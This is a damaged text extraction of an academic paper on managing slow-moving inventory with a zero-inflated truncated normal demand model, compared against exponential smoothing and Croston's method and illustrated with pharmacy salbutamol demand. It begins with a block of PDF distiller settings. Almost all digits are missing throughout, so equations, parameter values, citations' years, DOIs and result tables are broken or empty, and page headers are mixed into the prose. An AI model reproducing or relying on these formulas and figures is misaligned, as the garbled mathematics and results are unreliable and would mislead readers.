/colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted june accepted august published september corresponding author fernando rojas, fernando.rojas@uv.cl academic editor ka-chun wong additional information and declarations can be found on page doi . /peerj-cs. copyright rojas et al. distributed under creative commons cc-by . open access managing slow-moving item: a zero- inflated truncated normal approach for modeling demand fernando rojas , , peter wanke , giuliani coluccio , juan vega-vargas and gonzalo f. huerta-canepa micro-bioinnovation center, universidad de valparaíso, valparaíso, chile school of nutrition and dietetics, universidad de valparaiso, chile, valparaíso, chile coppead, universidade federal do rio de janeiro, rio de janeiro, brazil department of industrial and systems engineering, faculty of engineering, universidad de tarapacá, arica, chile faculty of engineering and sciences, universidad adolfo ibáñez, viña del mar, chile abstract this paper proposes a slow-moving management method for a system using of intermit- tent demand per unit time and lead time demand of items in service enterprise inventory models. our method uses zero-inflated truncated normal statistical distribution, which makes it possible to model intermittent demand per unit time using mixed statistical distribution. we conducted numerical experiments based on an algorithm used to forecast intermittent demand over fixed lead time to show that our proposed distributions improved the performance of the continuous review inventory model with shortages. we evaluated multi-criteria elements (total cost, fill-rate, shortage of quantity per cycle, and the adequacy of the statistical distribution of the lead time demand) for decision analysis using the technique for order of preference by similarity to ideal solution (topsis). we confirmed that our method improved the performance of the inventory model in comparison to other commonly used approaches such as simple exponential smoothing and croston’s method. we found an interesting association between the intermittency of demand per unit of time, the square root of this same parameter and reorder point decisions, that could be explained using classical multiple linear regression model. we confirmed that the parameter of variability of the zero- inflated truncated normal statistical distribution used to model intermittent demand was positively related to the decision of reorder points. our study examined a decision analysis using illustrative example. our suggested approach is original, valuable, and, in the case of slow-moving item management for service companies, allows for the verification of decision-making using multiple criteria. subjects algorithms and analysis of algorithms, data science, optimization theory and computation, scientific computing and simulation, operating systems keywords demand during lead time, inventory models, zero-inflated truncated normal statistical distribution introduction and literature review intermittent demand occurs when the demand per unit of time (dput) for products, parts, or pieces in some periods is zero (syntetos et al., ). this type of dput is how to cite this article rojas f, wanke p, coluccio g, vega-vargas j, huerta-canepa gf. . managing slow-moving item: a zero- inflated truncated normal approach for modeling demand. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:fernando.rojas@uv.cl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. often considered as a random variable due to its stochastic nature (cattani, jacobs & schoenfelder, ). intermittent dput a common occurrence for service and commercial companies that supply parts to industry sectors such as aerospace (ayu nariswari, bamford & dehe, ), automotive (zhang & xiaofeng, ), information technology (antosz & ratnayake, ), and military (babai, syntetos & teunter, ). this particular frequency in demand could impact different company strategies (pavlas et al., ; devika et al., ), such as the use of inventory models (jonkman, barbosa-póvoa & bloemhof, ). inventory models reduce costs and establish optimal stock levels in order to meet the demand for components and final products for customers (rojas et al., ). however, in models predicting zero demand, its parameters are not calculated the same because demand is characterized by intermittency, and the particularities of the intermittent demand need to be considered to develop more accurate inventory models (gregersen & hansen, ). inventory models that consider this type of demand are called slow-moving items (hahn & leucht, ). intermittent dput is also characterized by high variability across the non-zero values that compose the demand, requiring precise forecast models to be used in inventory models(kim & kim, ). traditional inventory models are based on a fixed demand (teixeira, lopes & figueiredo, ). however, updated models should factor in the uncertainty of demand (aloulou, dolgui & kovalyov, ). the uncertainty of dput and lead time demand (ltd) is a crucial aspect in supply chain management (khosravi et al., ). one of the most commonly used models in service company supply is the q,r model, which is a continuous review inventory model system (ponte et al., ; wen et al., ). this model reorders a fixed quantity (q) in a single period and makes a purchase or production order under an on-hand inventory level named the reorder point (r). we only need the average dput forecast to determine q, but knowing the complete ltd distribution is required to determine r. in order to facilitate calculations, a normal distribution for both dput and ltd is usually assumed (johnson, kotz & balakrishnan, ). nevertheless, other distributions used to model dput, lead time (lt), and ltd can provide more accurate inventory modeling. table in cobb, rumí & salmerón ( ) provides a summary of the distributions used in stochastic inventory models. although the normal distributed q,r model is competent at inventory management, applying it in models of intermittent demand could produce biased results. normal distribution does not work in intermittent demand modeling because it is difficult to predict empirical variation produced between non-zero and zero dputs. to address this problem and to treat this kind of data, several forecasting methods have been developed such as the: simple statistical smoothing methods, croston’s variant of exponential smoothing (croston, ; kourentzes, ), and bootstrap methods (willemain, smart & schwarz, ; ewbank et al., ). among these, the bootstrap methods have shown the best precision in updating the ltd and distributing the underlying probability of non-zero values. however, all of these methods have problems in providing precise estimates, given that the overdispersion of data coming from an intermittent dput negatively affects parameters estimation and truncated probability distributions. (zeileis, kleiber & jackman, ) and (yang, ) improved parameter estimation using the maximum likelihood rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. method that combines variable counts, zero mass points called hurdle models, truncated counts on the left, and censored counts on the right called zero-adjusted models. these distributions may be especially suitable for intermittent demand because of their ability to explicitly model non-zero and zero demand cases. statistical mixture distribution models can describe, estimate and simulate these types of data (bethea, ). here we highlight the q,r model and its use in slow-moving items. using zero-inflated statistical distribution modeling intermittent demand, appears promising, but its inventory modeling performance has not been adequately evaluated or compared to other methods (Ünlü, ). our objective was to propose slow-moving item management model that uses the statistical distribution of mixture, zero-inflated truncated normal (zitno), where the normal distribution component’s domain is defined only in real positive, to model intermittent dput forecasting with non-zero values and the ltd by means of a zero- inflated truncated normal sum (zitnosum). we examined their performance using a continuous review with a shortage inventory model that included total costs of inventory, fill-rate, the quantity of inventory shortage per cycle, and the statistical distribution of ltd. in ’background’, we describe the background of our proposal. we explain how to generate and implement several intermittent dput forecast models, including one predicting ltd when lt is constant. we use the following statistical distributions: zitno / zitno sum, simple exponential smoothing / simple exponential smoothing sum, and croston’s / croston’s sum, a simple exponential smoothing method variant. ‘numerical experiments and illustrative example’ is divided into three parts. ‘evaluating inventory model performance measures using topsis’ shows the numerical experiments we conducted to show the benefits of our proposed model. we compared different inventory models with multi-criteria decisions using the technique for order of preference by similarity to ideal solution (topsis) when the statistical distributions modeled the dput and ltd. in ‘effect of variability and intermittent dput with zitno statistical distribution on total costs and q and r decisions’, we determine the parameter of variability and how the proportion of zeros contained in the zitno statistical distribution affected total costs, q and r. in ‘analyzing real data using an illustrative example’, we show a decision analysis using an illustrative example. finally, in ‘discussion’, we discuss our findings, the limitations of the study, and our conclusions. background forecasting intermittent dput and ltd in this section, we show how to forecast an item’s complete ltd distribution. let y be an random variable of the dput. this dput is intermittent, meaning that , sometimes it is zero and sometimes it is not. this creates great variability in the data. let s be the ltd, which corresponds to a random sum that is expressed as: s= t+k∑ t=t+ yt, ( ) rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where k is the fixed lt used for forecasting ltd, with mean e(k)=µk and variance var(k)=σ k = . we consider k fixed when calculating ltd random variables using the formula {yt+ +···+yt+k,k ∈n}. we calculate the ltd mean using the formulas e({yt+ +···+yt+k})=µs and variance var({yt+ +···+yt+k})=σ s . (willemain, smart & schwarz, ) found that intermittent dput is often executed in strokes with longer sequences of zeros and other non-zero values. for this reason, it is possible to use a pattern of autocorrelation and a markov process of two first-order states can be used to forecast this random variable with temporal sequence. starting with a prediction of the sequence of zero and non-zero values during the k lt periods, these forecasts are conditioned to determine whether the last demand, yt , is zero or non-zero. using the counts of a historical or simulated demand time series, it possible to estimate the probabilities of state transitions (mosteller & tukey, ). scientific computing and simulation overlay play fundamental roles in generating knowledge and studying decision- making (salvatier, wiecki & fonnesbeck, ). it is therefore necessary to assign numeric values to non-zero predictions that cannot be based on unrealistic bootstraps, particularly those with poorly estimated ltd distribution tails made with values from the same historical data set. this problem is solved with jittering, defined as adding some random variations assumed with normal distribution in order to allow the use of values closer to the historical data. we adapted this method to generate a ltd jitter that is able to occupy an intermittent dput in a simulation approach for slow-moving items. a summary of this approach can be found in algorithm . the execution of algorithm requires r software, a free software for statistics and graphs that is used across the international scientific community, and can be consulted in the codes attached to this work with the name of ‘‘jitter.r’’. (rojas, ) used this software in supply models and programmed an r code in a generalized linear model (glm) environment. this allowed them to generate a sequence of random values following the statistical distribution zitno, as well as to estimate the parameters of this statistical distribution, among other functionalities. the rmarkovchain command of r package markovchain generates a random sequence of zero/non-zero markers of a known length for an random variable using an estimated transition probability matrix (spedicato, ). modeling dput and ltd with a constant lt in this subsection we show three statistical distributions that can be occupied when modeling of random variable dput, and three modeling distributions of the ltd, which is the sum of this random variable in a constant lt. these three pairs of statistical distributions are: simple exponential smoothing /simple exponential smoothing sum, croston’s / croston’s sum and zitno / zitnosum. for all cases, the following models assume that dput forecast are generated from a time t + ,...,t +m. for the ltd, it is assumed that lt is constant (µk ). dput and ltd forecasts are generated from algorithm . simple exponential smoothing / simple exponential smoothing sum this approach assume that ltd follows a normal statistical distribution and a fixed lt. the ltd mean and variance are calculated as follows: rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm generating intermittent dput and ltd forecasts for use in a slow-moving item inventory management model : generate a random sample of intermittent dputs of zitno statistical distribution of length n and fixed and known parameters. : estimate the transition probability matrix of the zero and non-zero dputs of n generated in step . : conditional on the last observed demand, generate a random sequence of zero/non- zero dput markers of known length using the transition probability matrix estimated in step . : replace every non-zero state marker with a numerical value sampled at random, with replacement, from the original set of observed non-zero dputs generated in step . : estimate the parameters of normal distribution adjusted to the non-zero values of the random sample with replacement achieved in step . : generate a ‘‘jitter’’ of the non-zero dput values, replacing the non-zero markers generated in step with random numbers generated from the normal statistical distribu- tion with estimated parameters in step . : from the sample ‘‘jitter’’ obtained in step , sum the values over the horizon of a constant lt to get ltd forecast values. (i) considering the mean level of dput as µses, and estimate using µses= t+m t+m∑ t=t+ (γyt +( −γ)µt− ses), where γ is a smoothing constant between and , selected to minimize ∑t+m t=t+ (yt − µses) ,t =t+ ,...,t+m. to initialize the smoothing, we can use the average of the first two demands µo= y +y . (ii) the dput variance with this approach can be calculated from: var(y )=σ ses= t+m t+m∑ t=t+ (yt −µses) ,∀y. the mean of k demands over the lt (µsses) is given by µsses =µkµses, and the variance of k demands over the lead time (σ ses) is calculated using one-step ahead forecast difference between the actual dput data and the mean lag, using the expression σ ses = m ∑t+m t=t+ (yt −µt− ses) . the variance of the ltd distribution (σ sses) can be estimated as: σ sses =σ sesµk . croston’s / croston’s sum variant of simple exponential smoothing method croston’s approach considers the dput mean using exponential smoothing that is separate from: rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (i) the mean intervals of data conformed between non-null demands (here, the smoothed estimate is denoted by it ) and (ii) the mean sizes of these intervals (here, the smoothed estimate is denoted by st ). in addition, q is the time interval since the last non-zero demand. croston’s approach can be described as follows: if y = , then st =st− it = it− q =q+ , ( ) else st =γyt +( −γ)st− it =γq+( −γ)it− q = . ( ) the combination of the size and interval estimates from eqs. ( ) and ( ), the dput mean can be expressed as: µcrost = t+m t+m∑ t=t+ ( st it ) these estimates update whenever a demand non null realization occurs. when a demand occurs during the same review interval, croston’s approach is identical to conventional exponential smoothing, where st =µtcrost . to initialize croston’s approach, we use the time until the first event and the size of the first event. the dput variance when using this method can be expressed as: var(y )=σ crost = t+m t+m∑ t=t+ (yt −µcrost ) . croston’s method also considers ltd with a constant lt and normal statistical distribution. the mean is expressed as: µscrost =µkµcrost, and the variance is calculated as: σ scrost =σ crostµk . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. zero inflated truncated normal / zero inflated truncated normal sum in this model, we assumed that dput has a zitno distribution and ltd has a zitnosum distribution with a constant lt. we estimated the mean level of dput (µzitno) and its variance (σ zitno) using: e(y )=µzitno=( −ν) ∫ ry> yφ (y−µno σno ) σno dy;with y > , and var(y )=σ zitno= t+m t+m∑ t=t+ (yt −µzitno) , respectively, where µno and σno are mean parameters and the standard deviation (sd) of a normal distribution of subset y > . note that y forecasting length measures from t+ to t+m. on the other hand, the expected ltd value (µszitnosum) and its variance (σ szitno ) under zitnosum distribution is calculated by: µszitnosum =µkµzitno, and σ szitnosum =σ zitnoµk, respectively. intermittent dput and ltd in the q,r model with shortage in q,r model with shortage, the expected annual total cost is the a sum of: (i) the product of the expected product stock quantity (in units) and holding cost per product unit per year (hc); (ii) the product of the expected number of orders per year and the ordering cost(oc), and finally (iii) the product of the unit punishment cost (sc) per units of the item in short supply, the expected number of orders per year, and the expected number of units of shortage product per year, which is a function of the reorder point (s(r)). we assumed that the organization maintains intermittent demand every day of the year ( ). the expected total cost per year (tc) in the (q,r) model can be expressed as: tc=g(q,r)= ( q +r−µs ) hc+ µ q oc+s(r) µ q sc, ( ) where µand µs values (note that the sequence of values of y forecast values from t+ to t+m, and that the dput sum needed to forecast the ltd is calculated using lt = k), can be calculated according to the probabilistic modeling showed in tables and . for diverse dput and ltd statistical distributions, see the probability density functions (pdfs), cumulative distribution functions (cdfs) and parameters in tables and (hadley & whitin, ; johnson & montgomery, ; silver, pyke & peterson, ). rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table modeling dput. distribution pdf cdf parameters zitno ( −ν)φ( y−µno σno ) σno (y> ) ν+( −ν) ( y−µno σno ) µno ∈r,σno > +ν (y= ) , <ν < simple exponential smoothing φ( y−µses σses ) σses ( y−µses σses ) µses ∈r,σses > croston’s φ( y−µcrost σcrost ) σcrost ( y−µcrost σcrost ) µcrost ∈r,σcrost > table modeling ltd. distribution pdf cdf parameters zitnosum ( −νs)φ( s−µnoµk σno(µk ) ) σno(µk ) (s> ) νs+( −νs) ( s−µnoµk σno(µk ) ) µnoµk ∈r,σno(µk)> +νs (s= ) ,µk = , <νs < simple exponential smoothing sum φ( s−µsesµk σsesµk ) σsesµk ( s−µsesµk σsesµk ) µsesµk ∈r,σsesµk > croston’s sum φ( s−µcrost µk σcrost µk ) σcrost µk ( s−µcrost µk σcrost µk ) µcrostµk ∈r,σcrostµk > in this formula, µ corresponds to the expected annual demand, to express the annual costs referred to in eq. ( ). however, µs does not require this transformation. q and r correspond to lot size decision variable to order and reorder points, respectively. s(r) is the expected shortage per cycle calculated as: s(r)= ∫ smax r (s−r)fs(s)ds, ( ) where smax is the maximum ltd value and the ltd pdf is denoted by fs(·). this expression can also be calculated using different assumptions ltd pdf assumptions shown in table . for any statistical distribution of dput and ltd, we can solver eq. ( ) using an iterative method, considering an initial solution of q= √ coµ ch (nahmias, ). here, the probability of obtaining a stockout when given the complement of the cdf (fs(r)) can be expressed as: −fs(r)= qhc µsc . to calculate the argument of this function (r), we applied this inverse function: r =f− s ( − qhc µsc ). ( ) to estimate the expected vale of s(r) function in eq. ( ) and to find the optimum lot size, we used: q= √ µ(oc+s(r)) hc . ( ) we repeated eqs. ( ) and ( ) until we reached a value of variation smaller than a previously established minimum threshold. we were then able to calculate lower q∗,r∗ values than eq. ( ). rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. measuring inventory model performance in this section, we will define some previously proposed general performance measures to evaluate a continuous review inventory model. these measures are applicable for the dput and ltd modeling shown in tables and . we will define four measures of performance: total costs, expected shortage per cycle, fill-rate, and the kullback–leibler divergence. finally, we present a multi-criteria decision analysis method using topsis that occupies the previously indicated performance measures as criteria to evaluate dput and ltd modeling alternatives. total cost of continuous review with the shortage inventory model by carrying out the iterations shown in a previous subsection, we calculated the decision variables that minimize the total cost of continuous review with shortage inventory model tc=g(q∗,r∗), applied to eq. ( ) for each model in tables and . an inventory model is more effective when it results in a lower annual cost. expected shortage per cycle we used a previously explained performance measurement to obtain the value of the expected amount of shortage per cycle (s(r∗)) given in eq. ( ), for each of the tested models in tables and . an inventory model is more effective when it results in a lower expected shortage per cycle. fill-rate (sobel, ) defined the fill-rate of a supply system as: ‘‘the fraction of demand that is met from on-hand inventory, understanding that the satisfaction of the demand is restricted to the amount purchased and available’’. we calculated the fill-rate for each statistical distribution shown in tables and using eq. ( ): fill−rate= ∫ q∗ o yf (y)dy∫ my yf (y)dy , ( ) where f (y) are the pdfs that are shown in table , and my is the maximal dput for each of the evaluated distributions. an inventory model is more effective when its fill-rate indicator value is closer to . kullback–leibler divergence to determine the quality of the proposed pdf and ltd approximation in table , we used the kullback–leibler divergence (cobb, ): kullback– leibler= ∫ ∞ −∞ log ( f (x) f̃ (x) ) f (x)dx, ( ) where f (·) is the unknown true pdf and f̃ (·) its approximation. to calculate the kullback– leibler divergence show in ( ), we used the kernel estimate to establish the true pdf (langseth et al., ). using eq. ( ), we computed the sequence {s ,...,sn} of n ltd realizations (or data). according to the data, we defined the kernel estimate of the unknown rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pdf of ltd fs(·) using: f̂s(s)= nh n∑ i= k ( si−s h ) , s≥ , ( ) where k(·) is a kernel function satisfying ∫ ∞ k(x)ds= , h a smoothing parameter and s the point at which the pdf is estimated. once eq. ( ) has been calculated, the kullback–leibler divergence for each ltd distribution established in table with support [a,b] can be expressed as: kullback– leibler′= ∫ b a log ( f̂s(s) f̃s(s) ) f̂s(s)ds, ( ) where f̂s(s) is the kernel estimate and f̃ (s) are the approximations proposed in table . we selected one of the approximations with a smaller kullback–leibler value than the one calculated using eq. ( ). topsis this multi-criteria decision analysis analyzes the geometric distances between a chosen solution, the ideal solution, and the least suitable solution (yoon & hwang, ; aye, gupta & wanke, ; de andrade, antunes & wanke, ). numerical experiments and illustrative example we used algorithm to generate intermittent dput and intermittent ltd. we performed repetitions or scenarios of dput samples using a zitno statistical distribution length n= , with the parameters µno = and σno = , a random proportion of zeros in the sample (ν), and an uniform generation in the interval [ , ]. this framework is applicable to each of the scenarios of the montecarlo (mc) study, where we assumed an expected ltd value = periods. for each scenario, we generated dput data ‘‘jitter’’ simulated from the transition matrix of the markov chain. therefore, each ltd scenario had a length of periods. for each scenario, we also generated uniform order costs (oc∼u[ ; ]), holding costs (hc∼u[ ; . ]) and shortage costs (sc∼u[ ; ]). these coefficients were chosen based on see table and appendix c in (wanke, ). to model the intermittent dput we used the statistical distributions in table , and to model ltd we used the statistical distributions shown in table . next, we estimated the parametersof normaldputand ltdprobabilitydistribution usingthe fitdist command of the gamlss package, and the ets and crost commands of the tsintermittent for simple exponential smoothing and croston’s method in r software. we occupied both of these parameters as the oc,hc and sc coefficients to obtain q∗,r∗, and tc values in eq. ( ) for each scenario. interested readers can consult the codes attached to this work under the names ‘‘zitno.r’’ and ‘‘topsissimulation.r’’. evaluating inventory model performance measures using topsis in this subsection, we used the topsis method to evaluate the performance of a continuous review inventory models with shortage. the dput/ltd modeling pairs were simple rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. exponential smoothing / simple exponential smoothing sum, croston’s /croston’s sum and zitno/zitnosum. figure compare boxplots (a) to (o) of performance measures of tc, s(r) and kullback–leibler divergence, segmented in data groups formed according to the level of intermittency of the dput ( <ν < . , . <ν < . , . <ν < . , . <ν < . and . <ν < ), between the proposal statistical distributions for results of scenarios of indicated inventory model. in this figure we have labeled simple exponential smoothing as ses. note that for all level of intermittency of the dput, except to <ν < . the indicated performance measures of inventory model are lower using the zitno statistical distribution. we confirm this statement using the respective kruskall-wallis tests (results not shown). in the case of the fill-rate comparison there were no differences, and its median was always in all the cases of intermittent levels of the dput and for all the statistical distributions studied (results not shown). table shows the ranked % of topsis order for each probability distribution model, segmented by intermittency level of the dput. note that in all cases, the statistical distribution zitno get better performance in the inventory model of continuous review with shortage, occupying a multi-criteria evaluation of decisions using topsis. effect of variability and intermittent dput with zitno statistical dis- tribution on total costs and q and r decisions this subsection discusses more in-depth how the parameter of variability (σno) and the proportion of zeros (ν) used to define the zitno statistical distribution affect the total costs and q and r decisions. with this objective, we repeated the simulation scheme proposed in ‘numerical experiments and illustrative example’, but considered a more significant dput variability, setting the parameter at σno = , and maintaining the parameter at µno= . figure shows scatterplots between the proportion of zeros in the dput (ν, labeled in x-axe as propdput) and tc, and q and r decisions, in scenarios where σno = and σno= . we explored these relationships using classical multiple linear regression analysis, where to avoid the problem of multicollinearity we used standardized values of the independent variables ν and √ ν (aiken, west & reno, ). table shows only the relationship between r ∼ ν+ √ ν (σno = ). in this model the adjusted r- squared is . . note that the regressor of ν is negative and significant, while the regressor of √ ν is positive and significant. these relationships can be explained by the expression of r =µkµzitno +z √ σ szitnosum =µkµzitno +z √ σ zitnoµk = µkµzitno+z √ t+m ∑t+m t=t+ (yt −µzitno) µk , where z is a security quantile of a standard normal distribution, and µzitno=( −ν) ∫ ry> yφ (y−µno σno ) σno dy;with y > . then, when ν decreases (there are more non-zero demands), r increases to have enough stock to deal with this situation, while when √ ν increases, the variance of the dput also increases, therefore it requires a larger safety stock and r to have enough stock for this case. rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparative boxplots (a) to (o) between proposal statistical distributions of tc, s(r) and kullback–leibler divergence segmented by ν. full-size doi: . /peerjcs. /fig- finally, we compared the differences between the optimal tcs, and the q and r decisions where σno= and σno= . table depicts descriptive measures such as mean, sd , interquartile range, and , , , and -th quantiles of r under both scenarios. we found significant differences for the wilcoxon signed-rank test with continuity correction regarding r decisions. analyzing real data using an illustrative example in order to show proposed method using real data, we selected a product experiencing intermittent demand from the inventory of a chilean public pharmacy. first, we carried rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table rank topsis order (%) for statistical distributions compared. distributions ν rank topsis order (%) zitno/ . <ν < , , zitnosum . <ν < . , , . <ν < . , , . <ν < . , , <ν < . , , simple exponential smoothing / . <ν < , , , simple exponential smoothing sum . <ν < . , , , . <ν < . , , , . <ν < . , , , <ν < . , , , croston’s / croston’s sum . <ν < , , , croston’s sum . <ν < . , , , . <ν < . , , , . <ν < . , , , <ν < . , , , out a statistical dput study using an adapted zitno statistical distribution. second, we evaluated the performance of a q,r supply model with a dput shortage and zitno statistical distribution. case presentation. public pharmacies in chile do not base their supply practices on drug availability (rojas et al., ). instead, they manage and maintain a mix of inventory. as shown in (rojas et al., ), models that factor in uncertain demands and shortages are useful for pharmacies. currently, chilean pharmacies manage their orders based on an annual needs planning with divided monthly orders and can be corrected up or down %, depending on the amount of inventory on hand. this method tries to comply with pharmaceutical safety recommendations, but suffers from supply decisions based on scientific criteria. this consequently increases total costs related to inventory management. therefore, it is necessary to design a supply policy that minimizes involved costs, considers drug demands, and ensures that patients receive their treatments on time. in this illustration, we carried out a statistical study of the dput for one product used in asthma treatments (called salbutamol) in an anonymous chilean public hospital pharmacy. we proposed an optimized inventory system with reduced costs. statistical study of the data set. we studied a data set of the daily demand of salbutamol inhalators. the data set spanned days. in order to study the temporal dependence of this data set, we looked at its autocorrelation function (acf) and partial acf (pacf) of dput, considering and not considering the null values (zeros). figure shows plots of the acfs and pacfs. we detected a small partial autocorrelation when the null data (zeros) were included, which may be due to the fact that the article obeys a medical prescription rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . a) propdput t c . . . b) propdput q . . . c) propdput r . . . d) propdput t c . . . e) propdput q . . . f) propdput r figure scatterplots: (a) tc∼ν(σno = ), (b) q∼ν(σno = ), (c) r ∼ν(σno = ), (d) tc∼ν(σno = ), (e) q∼ν(σno = ), and (f) r ∼ν(σno = ). full-size doi: . /peerjcs. /fig- table relationship between r ∼ν+ν (σno = ). estimate std. error t value pr(>|t|) (intercept) . . . . ν − . . − . . √ ν . . . . table descriptive measures of r decisions (scenarios where σno = and σno = ). r decisions mean sd iqr % % % % % r(σno = ) . . . . . . . . r(σno = ) . . . . . . . . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . . lag a c f a) acf series with zeros − . . . lag p a rt ia l a c f b) pacf series with zeros − . . . . lag a c f c) acf series withouth zeros − . . . lag p a rt ia l a c f d) pacf series withouth zeros figure acf and pacf of the data set: with zeros (a and b) and without zeros (c and d). full-size doi: . /peerjcs. /fig- table descriptive statistical indicators for the daily demand data set. dataset min max mean median sd cv cs ck n with zeros . . . − . − . without zeros . . . . − . every certain number of periods ( -day lag). in any case, the autocorrelation and partial autocorrelation was negligible. table shows the size, minimum and maximum values, mean, median, sd, coefficient of variation (cv), coefficient of skewness (cs), and coefficient of kurtosis (ck) of the daily demand data set. the raw data of ‘analyzing real data using an illustrative example’ is available to readers in supplemental files. figure shows an empirical quantile–quantile plot to confirm the good standing of our proposed statistical distribution zitno dput model. quantile–quantile plot is a graphical method for comparing two probability distributions by plotting their quantiles against each other. in this case, the proposed theoretical distribution (zitno) is compared rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − zitno quantiles e m p ir ic a l q u a n til e s figure quantile–quantile plot for statistical distribution proposal. full-size doi: . /peerjcs. /fig- table 